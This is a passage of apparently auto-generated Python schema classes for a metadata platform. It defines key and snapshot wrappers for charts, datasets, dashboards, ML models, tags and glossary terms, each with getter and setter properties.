name: str,
):
super().__init__()
self.featureNamespace = featureNamespace
self.name = name
@classmethod
def construct_with_defaults(cls) -> "MLPrimaryKeyKeyClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.featureNamespace = str()
self.name = str()
@property
def featureNamespace(self) -> str:
"""Getter: Namespace for the primary key"""
return self._inner_dict.get('featureNamespace') # type: ignore
@featureNamespace.setter
def featureNamespace(self, value: str) -> None:
"""Setter: Namespace for the primary key"""
self._inner_dict['featureNamespace'] = value
@property
def name(self) -> str:
"""Getter: Name of the primary key"""
return self._inner_dict.get('name') # type: ignore
@name.setter
def name(self, value: str) -> None:
"""Setter: Name of the primary key"""
self._inner_dict['name'] = value
class TagKeyClass(DictWrapper):
"""Key for a Tag"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.key.TagKey")
def __init__(self,
name: str,
):
super().__init__()
self.name = name
@classmethod
def construct_with_defaults(cls) -> "TagKeyClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.name = str()
@property
def name(self) -> str:
"""Getter: The unique tag name"""
return self._inner_dict.get('name') # type: ignore
@name.setter
def name(self, value: str) -> None:
"""Setter: The unique tag name"""
self._inner_dict['name'] = value
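Every key class above follows the same dict-backed property pattern: attribute access is routed through `@property` getters and setters that read from and write to `self._inner_dict`, and `construct_with_defaults` builds an empty instance before restoring default values. A minimal, self-contained sketch of that pattern (the `MiniKey` class here is hypothetical, not part of this module):

```python
from typing import Any, Dict, Optional


class MiniKey:
    """Hypothetical stand-in illustrating the generated key-class pattern."""

    def __init__(self, name: str):
        self._inner_dict: Dict[str, Any] = {}
        self.name = name  # routed through the property setter below

    @classmethod
    def construct_with_defaults(cls) -> "MiniKey":
        # Mirrors the generated classmethods: build an empty instance
        # (bypassing __init__), then restore field defaults.
        self = cls.__new__(cls)
        self._inner_dict = {}
        self._restore_defaults()
        return self

    def _restore_defaults(self) -> None:
        self.name = str()

    @property
    def name(self) -> Optional[str]:
        return self._inner_dict.get('name')  # backing store is the inner dict

    @name.setter
    def name(self, value: str) -> None:
        self._inner_dict['name'] = value
```

Setting an attribute therefore mutates the underlying dict directly, which is what lets these wrappers serialize to and from their Avro record schemas without a separate translation step.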
class ChartSnapshotClass(DictWrapper):
"""A metadata snapshot for a specific Chart entity."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.snapshot.ChartSnapshot")
def __init__(self,
urn: str,
aspects: List[Union["ChartKeyClass", "ChartInfoClass", "ChartQueryClass", "EditableChartPropertiesClass", "OwnershipClass", "StatusClass", "GlobalTagsClass", "BrowsePathsClass"]],
):
super().__init__()
self.urn = urn
self.aspects = aspects
@classmethod
def construct_with_defaults(cls) -> "ChartSnapshotClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.urn = str()
self.aspects = list()
@property
def urn(self) -> str:
"""Getter: URN for the entity the metadata snapshot is associated with."""
return self._inner_dict.get('urn') # type: ignore
@urn.setter
def urn(self, value: str) -> None:
"""Setter: URN for the entity the metadata snapshot is associated with."""
self._inner_dict['urn'] = value
@property
def aspects(self) -> List[Union["ChartKeyClass", "ChartInfoClass", "ChartQueryClass", "EditableChartPropertiesClass", "OwnershipClass", "StatusClass", "GlobalTagsClass", "BrowsePathsClass"]]:
"""Getter: The list of metadata aspects associated with the chart. Depending on the use case, this can either be all, or a selection, of supported aspects."""
return self._inner_dict.get('aspects') # type: ignore
@aspects.setter
def aspects(self, value: List[Union["ChartKeyClass", "ChartInfoClass", "ChartQueryClass", "EditableChartPropertiesClass", "OwnershipClass", "StatusClass", "GlobalTagsClass", "BrowsePathsClass"]]) -> None:
"""Setter: The list of metadata aspects associated with the chart. Depending on the use case, this can either be all, or a selection, of supported aspects."""
self._inner_dict['aspects'] = value
class CorpGroupSnapshotClass(DictWrapper):
"""A metadata snapshot for a specific CorpGroup entity."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.snapshot.CorpGroupSnapshot")
def __init__(self,
urn: str,
aspects: List[Union["CorpGroupKeyClass", "CorpGroupInfoClass", "GlobalTagsClass", "StatusClass"]],
):
super().__init__()
self.urn = urn
self.aspects = aspects
@classmethod
def construct_with_defaults(cls) -> "CorpGroupSnapshotClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.urn = str()
self.aspects = list()
@property
def urn(self) -> str:
"""Getter: URN for the entity the metadata snapshot is associated with."""
return self._inner_dict.get('urn') # type: ignore
@urn.setter
def urn(self, value: str) -> None:
"""Setter: URN for the entity the metadata snapshot is associated with."""
self._inner_dict['urn'] = value
@property
def aspects(self) -> List[Union["CorpGroupKeyClass", "CorpGroupInfoClass", "GlobalTagsClass", "StatusClass"]]:
"""Getter: The list of metadata aspects associated with the LdapUser. Depending on the use case, this can either be all, or a selection, of supported aspects."""
return self._inner_dict.get('aspects') # type: ignore
@aspects.setter
def aspects(self, value: List[Union["CorpGroupKeyClass", "CorpGroupInfoClass", "GlobalTagsClass", "StatusClass"]]) -> None:
"""Setter: The list of metadata aspects associated with the LdapUser. Depending on the use case, this can either be all, or a selection, of supported aspects."""
self._inner_dict['aspects'] = value
class CorpUserSnapshotClass(DictWrapper):
"""A metadata snapshot for a specific CorpUser entity."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.snapshot.CorpUserSnapshot")
def __init__(self,
urn: str,
aspects: List[Union["CorpUserKeyClass", "CorpUserInfoClass", "CorpUserEditableInfoClass", "GlobalTagsClass", "StatusClass"]],
):
super().__init__()
self.urn = urn
self.aspects = aspects
@classmethod
def construct_with_defaults(cls) -> "CorpUserSnapshotClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.urn = str()
self.aspects = list()
@property
def urn(self) -> str:
"""Getter: URN for the entity the metadata snapshot is associated with."""
return self._inner_dict.get('urn') # type: ignore
@urn.setter
def urn(self, value: str) -> None:
"""Setter: URN for the entity the metadata snapshot is associated with."""
self._inner_dict['urn'] = value
@property
def aspects(self) -> List[Union["CorpUserKeyClass", "CorpUserInfoClass", "CorpUserEditableInfoClass", "GlobalTagsClass", "StatusClass"]]:
"""Getter: The list of metadata aspects associated with the CorpUser. Depending on the use case, this can either be all, or a selection, of supported aspects."""
return self._inner_dict.get('aspects') # type: ignore
@aspects.setter
def aspects(self, value: List[Union["CorpUserKeyClass", "CorpUserInfoClass", "CorpUserEditableInfoClass", "GlobalTagsClass", "StatusClass"]]) -> None:
"""Setter: The list of metadata aspects associated with the CorpUser. Depending on the use case, this can either be all, or a selection, of supported aspects."""
self._inner_dict['aspects'] = value
class DashboardSnapshotClass(DictWrapper):
"""A metadata snapshot for a specific Dashboard entity."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.snapshot.DashboardSnapshot")
def __init__(self,
urn: str,
aspects: List[Union["DashboardKeyClass", "DashboardInfoClass", "EditableDashboardPropertiesClass", "OwnershipClass", "StatusClass", "GlobalTagsClass", "BrowsePathsClass"]],
):
super().__init__()
self.urn = urn
self.aspects = aspects
@classmethod
def construct_with_defaults(cls) -> "DashboardSnapshotClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.urn = str()
self.aspects = list()
@property
def urn(self) -> str:
"""Getter: URN for the entity the metadata snapshot is associated with."""
return self._inner_dict.get('urn') # type: ignore
@urn.setter
def urn(self, value: str) -> None:
"""Setter: URN for the entity the metadata snapshot is associated with."""
self._inner_dict['urn'] = value
@property
def aspects(self) -> List[Union["DashboardKeyClass", "DashboardInfoClass", "EditableDashboardPropertiesClass", "OwnershipClass", "StatusClass", "GlobalTagsClass", "BrowsePathsClass"]]:
"""Getter: The list of metadata aspects associated with the dashboard. Depending on the use case, this can either be all, or a selection, of supported aspects."""
return self._inner_dict.get('aspects') # type: ignore
@aspects.setter
def aspects(self, value: List[Union["DashboardKeyClass", "DashboardInfoClass", "EditableDashboardPropertiesClass", "OwnershipClass", "StatusClass", "GlobalTagsClass", "BrowsePathsClass"]]) -> None:
"""Setter: The list of metadata aspects associated with the dashboard. Depending on the use case, this can either be all, or a selection, of supported aspects."""
self._inner_dict['aspects'] = value
class DataFlowSnapshotClass(DictWrapper):
"""A metadata snapshot for a specific DataFlow entity."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.snapshot.DataFlowSnapshot")
def __init__(self,
urn: str,
aspects: List[Union["DataFlowKeyClass", "DataFlowInfoClass", "EditableDataFlowPropertiesClass", "OwnershipClass", "StatusClass", "GlobalTagsClass", "BrowsePathsClass"]],
):
super().__init__()
self.urn = urn
self.aspects = aspects
@classmethod
def construct_with_defaults(cls) -> "DataFlowSnapshotClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.urn = str()
self.aspects = list()
@property
def urn(self) -> str:
"""Getter: URN for the entity the metadata snapshot is associated with."""
return self._inner_dict.get('urn') # type: ignore
@urn.setter
def urn(self, value: str) -> None:
"""Setter: URN for the entity the metadata snapshot is associated with."""
self._inner_dict['urn'] = value
@property
def aspects(self) -> List[Union["DataFlowKeyClass", "DataFlowInfoClass", "EditableDataFlowPropertiesClass", "OwnershipClass", "StatusClass", "GlobalTagsClass", "BrowsePathsClass"]]:
"""Getter: The list of metadata aspects associated with the data flow. Depending on the use case, this can either be all, or a selection, of supported aspects."""
return self._inner_dict.get('aspects') # type: ignore
@aspects.setter
def aspects(self, value: List[Union["DataFlowKeyClass", "DataFlowInfoClass", "EditableDataFlowPropertiesClass", "OwnershipClass", "StatusClass", "GlobalTagsClass", "BrowsePathsClass"]]) -> None:
"""Setter: The list of metadata aspects associated with the data flow. Depending on the use case, this can either be all, or a selection, of supported aspects."""
self._inner_dict['aspects'] = value
class DataJobSnapshotClass(DictWrapper):
"""A metadata snapshot for a specific DataJob entity."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.snapshot.DataJobSnapshot")
def __init__(self,
urn: str,
aspects: List[Union["DataJobKeyClass", "DataJobInfoClass", "DataJobInputOutputClass", "EditableDataJobPropertiesClass", "OwnershipClass", "StatusClass", "GlobalTagsClass", "BrowsePathsClass"]],
):
super().__init__()
self.urn = urn
self.aspects = aspects
@classmethod
def construct_with_defaults(cls) -> "DataJobSnapshotClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.urn = str()
self.aspects = list()
@property
def urn(self) -> str:
"""Getter: URN for the entity the metadata snapshot is associated with."""
return self._inner_dict.get('urn') # type: ignore
@urn.setter
def urn(self, value: str) -> None:
"""Setter: URN for the entity the metadata snapshot is associated with."""
self._inner_dict['urn'] = value
@property
def aspects(self) -> List[Union["DataJobKeyClass", "DataJobInfoClass", "DataJobInputOutputClass", "EditableDataJobPropertiesClass", "OwnershipClass", "StatusClass", "GlobalTagsClass", "BrowsePathsClass"]]:
"""Getter: The list of metadata aspects associated with the data job. Depending on the use case, this can either be all, or a selection, of supported aspects."""
return self._inner_dict.get('aspects') # type: ignore
@aspects.setter
def aspects(self, value: List[Union["DataJobKeyClass", "DataJobInfoClass", "DataJobInputOutputClass", "EditableDataJobPropertiesClass", "OwnershipClass", "StatusClass", "GlobalTagsClass", "BrowsePathsClass"]]) -> None:
"""Setter: The list of metadata aspects associated with the data job. Depending on the use case, this can either be all, or a selection, of supported aspects."""
self._inner_dict['aspects'] = value
class DataPlatformSnapshotClass(DictWrapper):
"""A metadata snapshot for a specific dataplatform entity."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.snapshot.DataPlatformSnapshot")
def __init__(self,
urn: str,
aspects: List[Union["DataPlatformKeyClass", "DataPlatformInfoClass"]],
):
super().__init__()
self.urn = urn
self.aspects = aspects
@classmethod
def construct_with_defaults(cls) -> "DataPlatformSnapshotClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.urn = str()
self.aspects = list()
@property
def urn(self) -> str:
"""Getter: URN for the entity the metadata snapshot is associated with."""
return self._inner_dict.get('urn') # type: ignore
@urn.setter
def urn(self, value: str) -> None:
"""Setter: URN for the entity the metadata snapshot is associated with."""
self._inner_dict['urn'] = value
@property
def aspects(self) -> List[Union["DataPlatformKeyClass", "DataPlatformInfoClass"]]:
"""Getter: The list of metadata aspects associated with the data platform. Depending on the use case, this can either be all, or a selection, of supported aspects."""
return self._inner_dict.get('aspects') # type: ignore
@aspects.setter
def aspects(self, value: List[Union["DataPlatformKeyClass", "DataPlatformInfoClass"]]) -> None:
"""Setter: The list of metadata aspects associated with the data platform. Depending on the use case, this can either be all, or a selection, of supported aspects."""
self._inner_dict['aspects'] = value
class DataProcessSnapshotClass(DictWrapper):
"""A metadata snapshot for a specific Data process entity."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.snapshot.DataProcessSnapshot")
def __init__(self,
urn: str,
aspects: List[Union["DataProcessKeyClass", "OwnershipClass", "DataProcessInfoClass", "StatusClass"]],
):
super().__init__()
self.urn = urn
self.aspects = aspects
@classmethod
def construct_with_defaults(cls) -> "DataProcessSnapshotClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.urn = str()
self.aspects = list()
@property
def urn(self) -> str:
"""Getter: URN for the entity the metadata snapshot is associated with."""
return self._inner_dict.get('urn') # type: ignore
@urn.setter
def urn(self, value: str) -> None:
"""Setter: URN for the entity the metadata snapshot is associated with."""
self._inner_dict['urn'] = value
@property
def aspects(self) -> List[Union["DataProcessKeyClass", "OwnershipClass", "DataProcessInfoClass", "StatusClass"]]:
"""Getter: The list of metadata aspects associated with the data process. Depending on the use case, this can either be all, or a selection, of supported aspects."""
return self._inner_dict.get('aspects') # type: ignore
@aspects.setter
def aspects(self, value: List[Union["DataProcessKeyClass", "OwnershipClass", "DataProcessInfoClass", "StatusClass"]]) -> None:
"""Setter: The list of metadata aspects associated with the data process. Depending on the use case, this can either be all, or a selection, of supported aspects."""
self._inner_dict['aspects'] = value
class DatasetSnapshotClass(DictWrapper):
"""A metadata snapshot for a specific Dataset entity."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.snapshot.DatasetSnapshot")
def __init__(self,
urn: str,
aspects: List[Union["DatasetKeyClass", "DatasetPropertiesClass", "EditableDatasetPropertiesClass", "DatasetDeprecationClass", "DatasetUpstreamLineageClass", "UpstreamLineageClass", "InstitutionalMemoryClass", "OwnershipClass", "StatusClass", "SchemaMetadataClass", "EditableSchemaMetadataClass", "GlobalTagsClass", "GlossaryTermsClass", "BrowsePathsClass"]],
):
super().__init__()
self.urn = urn
self.aspects = aspects
@classmethod
def construct_with_defaults(cls) -> "DatasetSnapshotClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.urn = str()
self.aspects = list()
@property
def urn(self) -> str:
"""Getter: URN for the entity the metadata snapshot is associated with."""
return self._inner_dict.get('urn') # type: ignore
@urn.setter
def urn(self, value: str) -> None:
"""Setter: URN for the entity the metadata snapshot is associated with."""
self._inner_dict['urn'] = value
@property
def aspects(self) -> List[Union["DatasetKeyClass", "DatasetPropertiesClass", "EditableDatasetPropertiesClass", "DatasetDeprecationClass", "DatasetUpstreamLineageClass", "UpstreamLineageClass", "InstitutionalMemoryClass", "OwnershipClass", "StatusClass", "SchemaMetadataClass", "EditableSchemaMetadataClass", "GlobalTagsClass", "GlossaryTermsClass", "BrowsePathsClass"]]:
"""Getter: The list of metadata aspects associated with the dataset. Depending on the use case, this can either be all, or a selection, of supported aspects."""
return self._inner_dict.get('aspects') # type: ignore
@aspects.setter
def aspects(self, value: List[Union["DatasetKeyClass", "DatasetPropertiesClass", "EditableDatasetPropertiesClass", "DatasetDeprecationClass", "DatasetUpstreamLineageClass", "UpstreamLineageClass", "InstitutionalMemoryClass", "OwnershipClass", "StatusClass", "SchemaMetadataClass", "EditableSchemaMetadataClass", "GlobalTagsClass", "GlossaryTermsClass", "BrowsePathsClass"]]) -> None:
"""Setter: The list of metadata aspects associated with the dataset. Depending on the use case, this can either be all, or a selection, of supported aspects."""
self._inner_dict['aspects'] = value
class GlossaryNodeSnapshotClass(DictWrapper):
"""A metadata snapshot for a specific GlossaryNode entity."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.snapshot.GlossaryNodeSnapshot")
def __init__(self,
urn: str,
aspects: List[Union["GlossaryNodeKeyClass", "GlossaryNodeInfoClass", "OwnershipClass", "StatusClass"]],
):
super().__init__()
self.urn = urn
self.aspects = aspects
@classmethod
def construct_with_defaults(cls) -> "GlossaryNodeSnapshotClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.urn = str()
self.aspects = list()
@property
def urn(self) -> str:
"""Getter: URN for the entity the metadata snapshot is associated with."""
return self._inner_dict.get('urn') # type: ignore
@urn.setter
def urn(self, value: str) -> None:
"""Setter: URN for the entity the metadata snapshot is associated with."""
self._inner_dict['urn'] = value
@property
def aspects(self) -> List[Union["GlossaryNodeKeyClass", "GlossaryNodeInfoClass", "OwnershipClass", "StatusClass"]]:
"""Getter: The list of metadata aspects associated with the GlossaryNode. Depending on the use case, this can either be all, or a selection, of supported aspects."""
return self._inner_dict.get('aspects') # type: ignore
@aspects.setter
def aspects(self, value: List[Union["GlossaryNodeKeyClass", "GlossaryNodeInfoClass", "OwnershipClass", "StatusClass"]]) -> None:
"""Setter: The list of metadata aspects associated with the GlossaryNode. Depending on the use case, this can either be all, or a selection, of supported aspects."""
self._inner_dict['aspects'] = value
class GlossaryTermSnapshotClass(DictWrapper):
"""A metadata snapshot for a specific GlossaryTerm entity."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.snapshot.GlossaryTermSnapshot")
def __init__(self,
urn: str,
aspects: List[Union["GlossaryTermKeyClass", "GlossaryTermInfoClass", "OwnershipClass", "StatusClass"]],
):
super().__init__()
self.urn = urn
self.aspects = aspects
@classmethod
def construct_with_defaults(cls) -> "GlossaryTermSnapshotClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.urn = str()
self.aspects = list()
@property
def urn(self) -> str:
"""Getter: URN for the entity the metadata snapshot is associated with."""
return self._inner_dict.get('urn') # type: ignore
@urn.setter
def urn(self, value: str) -> None:
"""Setter: URN for the entity the metadata snapshot is associated with."""
self._inner_dict['urn'] = value
@property
def aspects(self) -> List[Union["GlossaryTermKeyClass", "GlossaryTermInfoClass", "OwnershipClass", "StatusClass"]]:
"""Getter: The list of metadata aspects associated with the GlossaryTerm. Depending on the use case, this can either be all, or a selection, of supported aspects."""
return self._inner_dict.get('aspects') # type: ignore
@aspects.setter
def aspects(self, value: List[Union["GlossaryTermKeyClass", "GlossaryTermInfoClass", "OwnershipClass", "StatusClass"]]) -> None:
"""Setter: The list of metadata aspects associated with the GlossaryTerm. Depending on the use case, this can either be all, or a selection, of supported aspects."""
self._inner_dict['aspects'] = value
class MLFeatureSnapshotClass(DictWrapper):
# No docs available.
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.snapshot.MLFeatureSnapshot")
def __init__(self,
urn: str,
aspects: List[Union["MLFeatureKeyClass", "MLFeaturePropertiesClass", "OwnershipClass", "InstitutionalMemoryClass", "StatusClass", "DeprecationClass", "BrowsePathsClass"]],
):
super().__init__()
self.urn = urn
self.aspects = aspects
@classmethod
def construct_with_defaults(cls) -> "MLFeatureSnapshotClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.urn = str()
self.aspects = list()
@property
def urn(self) -> str:
"""Getter: URN for the entity the metadata snapshot is associated with."""
return self._inner_dict.get('urn') # type: ignore
@urn.setter
def urn(self, value: str) -> None:
"""Setter: URN for the entity the metadata snapshot is associated with."""
self._inner_dict['urn'] = value
@property
def aspects(self) -> List[Union["MLFeatureKeyClass", "MLFeaturePropertiesClass", "OwnershipClass", "InstitutionalMemoryClass", "StatusClass", "DeprecationClass", "BrowsePathsClass"]]:
"""Getter: The list of metadata aspects associated with the MLFeature. Depending on the use case, this can either be all, or a selection, of supported aspects."""
return self._inner_dict.get('aspects') # type: ignore
@aspects.setter
def aspects(self, value: List[Union["MLFeatureKeyClass", "MLFeaturePropertiesClass", "OwnershipClass", "InstitutionalMemoryClass", "StatusClass", "DeprecationClass", "BrowsePathsClass"]]) -> None:
"""Setter: The list of metadata aspects associated with the MLFeature. Depending on the use case, this can either be all, or a selection, of supported aspects."""
self._inner_dict['aspects'] = value
class MLFeatureTableSnapshotClass(DictWrapper):
# No docs available.
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.snapshot.MLFeatureTableSnapshot")
def __init__(self,
urn: str,
aspects: List[Union["MLFeatureTableKeyClass", "MLFeatureTablePropertiesClass", "OwnershipClass", "InstitutionalMemoryClass", "StatusClass", "DeprecationClass", "BrowsePathsClass"]],
):
super().__init__()
self.urn = urn
self.aspects = aspects
@classmethod
def construct_with_defaults(cls) -> "MLFeatureTableSnapshotClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.urn = str()
self.aspects = list()
@property
def urn(self) -> str:
"""Getter: URN for the entity the metadata snapshot is associated with."""
return self._inner_dict.get('urn') # type: ignore
@urn.setter
def urn(self, value: str) -> None:
"""Setter: URN for the entity the metadata snapshot is associated with."""
self._inner_dict['urn'] = value
@property
def aspects(self) -> List[Union["MLFeatureTableKeyClass", "MLFeatureTablePropertiesClass", "OwnershipClass", "InstitutionalMemoryClass", "StatusClass", "DeprecationClass", "BrowsePathsClass"]]:
"""Getter: The list of metadata aspects associated with the MLFeatureTable. Depending on the use case, this can either be all, or a selection, of supported aspects."""
return self._inner_dict.get('aspects') # type: ignore
@aspects.setter
def aspects(self, value: List[Union["MLFeatureTableKeyClass", "MLFeatureTablePropertiesClass", "OwnershipClass", "InstitutionalMemoryClass", "StatusClass", "DeprecationClass", "BrowsePathsClass"]]) -> None:
"""Setter: The list of metadata aspects associated with the MLFeatureTable. Depending on the use case, this can either be all, or a selection, of supported aspects."""
self._inner_dict['aspects'] = value
class MLModelSnapshotClass(DictWrapper):
"""MLModel Snapshot entity details."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.snapshot.MLModelSnapshot")
def __init__(self,
urn: str,
aspects: List[Union["MLModelKeyClass", "OwnershipClass", "MLModelPropertiesClass", "IntendedUseClass", "MLModelFactorPromptsClass", "MetricsClass", "EvaluationDataClass", "TrainingDataClass", "QuantitativeAnalysesClass", "EthicalConsiderationsClass", "CaveatsAndRecommendationsClass", "InstitutionalMemoryClass", "SourceCodeClass", "StatusClass", "CostClass", "DeprecationClass", "BrowsePathsClass"]],
):
super().__init__()
self.urn = urn
self.aspects = aspects
@classmethod
def construct_with_defaults(cls) -> "MLModelSnapshotClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.urn = str()
self.aspects = list()
@property
def urn(self) -> str:
"""Getter: URN for the entity the metadata snapshot is associated with."""
return self._inner_dict.get('urn') # type: ignore
@urn.setter
def urn(self, value: str) -> None:
"""Setter: URN for the entity the metadata snapshot is associated with."""
self._inner_dict['urn'] = value
@property
def aspects(self) -> List[Union["MLModelKeyClass", "OwnershipClass", "MLModelPropertiesClass", "IntendedUseClass", "MLModelFactorPromptsClass", "MetricsClass", "EvaluationDataClass", "TrainingDataClass", "QuantitativeAnalysesClass", "EthicalConsiderationsClass", "CaveatsAndRecommendationsClass", "InstitutionalMemoryClass", "SourceCodeClass", "StatusClass", "CostClass", "DeprecationClass", "BrowsePathsClass"]]:
"""Getter: The list of metadata aspects associated with the MLModel. Depending on the use case, this can either be all, or a selection, of supported aspects."""
return self._inner_dict.get('aspects') # type: ignore
@aspects.setter
def aspects(self, value: List[Union["MLModelKeyClass", "OwnershipClass", "MLModelPropertiesClass", "IntendedUseClass", "MLModelFactorPromptsClass", "MetricsClass", "EvaluationDataClass", "TrainingDataClass", "QuantitativeAnalysesClass", "EthicalConsiderationsClass", "CaveatsAndRecommendationsClass", "InstitutionalMemoryClass", "SourceCodeClass", "StatusClass", "CostClass", "DeprecationClass", "BrowsePathsClass"]]) -> None:
"""Setter: The list of metadata aspects associated with the MLModel. Depending on the use case, this can either be all, or a selection, of supported aspects."""
self._inner_dict['aspects'] = value
class MLPrimaryKeySnapshotClass(DictWrapper):
# No docs available.
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.snapshot.MLPrimaryKeySnapshot")
def __init__(self,
urn: str,
aspects: List[Union["MLPrimaryKeyKeyClass", "MLPrimaryKeyPropertiesClass", "OwnershipClass", "InstitutionalMemoryClass", "StatusClass", "DeprecationClass"]],
):
super().__init__()
self.urn = urn
self.aspects = aspects
@classmethod
def construct_with_defaults(cls) -> "MLPrimaryKeySnapshotClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.urn = str()
self.aspects = list()
@property
def urn(self) -> str:
"""Getter: URN for the entity the metadata snapshot is associated with."""
return self._inner_dict.get('urn') # type: ignore
@urn.setter
def urn(self, value: str) -> None:
"""Setter: URN for the entity the metadata snapshot is associated with."""
self._inner_dict['urn'] = value
@property
def aspects(self) -> List[Union["MLPrimaryKeyKeyClass", "MLPrimaryKeyPropertiesClass", "OwnershipClass", "InstitutionalMemoryClass", "StatusClass", "DeprecationClass"]]:
"""Getter: The list of metadata aspects associated with the MLPrimaryKey. Depending on the use case, this can either be all, or a selection, of supported aspects."""
return self._inner_dict.get('aspects') # type: ignore
@aspects.setter
def aspects(self, value: List[Union["MLPrimaryKeyKeyClass", "MLPrimaryKeyPropertiesClass", "OwnershipClass", "InstitutionalMemoryClass", "StatusClass", "DeprecationClass"]]) -> None:
"""Setter: The list of metadata aspects associated with the MLPrimaryKey. Depending on the use case, this can either be all, or a selection, of supported aspects."""
self._inner_dict['aspects'] = value
class TagSnapshotClass(DictWrapper):
"""A metadata snapshot for a specific dataset entity."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.snapshot.TagSnapshot")
def __init__(self,
urn: str,
aspects: List[Union["TagKeyClass", "OwnershipClass", "TagPropertiesClass", "StatusClass"]],
):
super().__init__()
self.urn = urn
self.aspects = aspects
@classmethod
def construct_with_defaults(cls) -> "TagSnapshotClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.urn = str()
self.aspects = list()
@property
def urn(self) -> str:
"""Getter: URN for the entity the metadata snapshot is associated with."""
return self._inner_dict.get('urn') # type: ignore
@urn.setter
def urn(self, value: str) -> None:
"""Setter: URN for the entity the metadata snapshot is associated with."""
self._inner_dict['urn'] = value
@property
def aspects(self) -> List[Union["TagKeyClass", "OwnershipClass", "TagPropertiesClass", "StatusClass"]]:
"""Getter: The list of metadata aspects associated with the dataset. Depending on the use case, this can either be all, or a selection, of supported aspects."""
return self._inner_dict.get('aspects') # type: ignore
@aspects.setter
def aspects(self, value: List[Union["TagKeyClass", "OwnershipClass", "TagPropertiesClass", "StatusClass"]]) -> None:
"""Setter: The list of metadata aspects associated with the dataset. Depending on the use case, this can either be all, or a selection, of supported aspects."""
self._inner_dict['aspects'] = value
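# Illustrative usage (hand-written, not generated; the URN value is an
# assumption for the example). A snapshot can be built empty via the
# construct_with_defaults() helper defined on each class, then populated:
#
#     snapshot = TagSnapshotClass.construct_with_defaults()
#     snapshot.urn = "urn:li:tag:PII"
#     snapshot.aspects = []
#
# Equivalently, pass urn and aspects directly to the constructor.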
class BaseDataClass(DictWrapper):
"""BaseData record"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.ml.metadata.BaseData")
def __init__(self,
dataset: str,
motivation: Union[None, str]=None,
preProcessing: Union[None, List[str]]=None,
):
super().__init__()
self.dataset = dataset
self.motivation = motivation
self.preProcessing = preProcessing
@classmethod
def construct_with_defaults(cls) -> "BaseDataClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.dataset = str()
self.motivation = self.RECORD_SCHEMA.field_map["motivation"].default
self.preProcessing = self.RECORD_SCHEMA.field_map["preProcessing"].default
@property
def dataset(self) -> str:
"""Getter: What dataset were used in the MLModel?"""
return self._inner_dict.get('dataset') # type: ignore
@dataset.setter
def dataset(self, value: str) -> None:
"""Setter: What dataset were used in the MLModel?"""
self._inner_dict['dataset'] = value
@property
def motivation(self) -> Union[None, str]:
"""Getter: Why was this dataset chosen?"""
return self._inner_dict.get('motivation') # type: ignore
@motivation.setter
def motivation(self, value: Union[None, str]) -> None:
"""Setter: Why was this dataset chosen?"""
self._inner_dict['motivation'] = value
@property
def preProcessing(self) -> Union[None, List[str]]:
"""Getter: How was the data preprocessed (e.g., tokenization of sentences, cropping of images, any filtering such as dropping images without faces)?"""
return self._inner_dict.get('preProcessing') # type: ignore
@preProcessing.setter
def preProcessing(self, value: Union[None, List[str]]) -> None:
"""Setter: How was the data preprocessed (e.g., tokenization of sentences, cropping of images, any filtering such as dropping images without faces)?"""
self._inner_dict['preProcessing'] = value
class CaveatDetailsClass(DictWrapper):
"""This section should list additional concerns that were not covered in the previous sections. For example, did the results suggest any further testing? Were there any relevant groups that were not represented in the evaluation dataset? Are there additional recommendations for model use?"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.ml.metadata.CaveatDetails")
def __init__(self,
needsFurtherTesting: Union[None, bool]=None,
caveatDescription: Union[None, str]=None,
groupsNotRepresented: Union[None, List[str]]=None,
):
super().__init__()
self.needsFurtherTesting = needsFurtherTesting
self.caveatDescription = caveatDescription
self.groupsNotRepresented = groupsNotRepresented
@classmethod
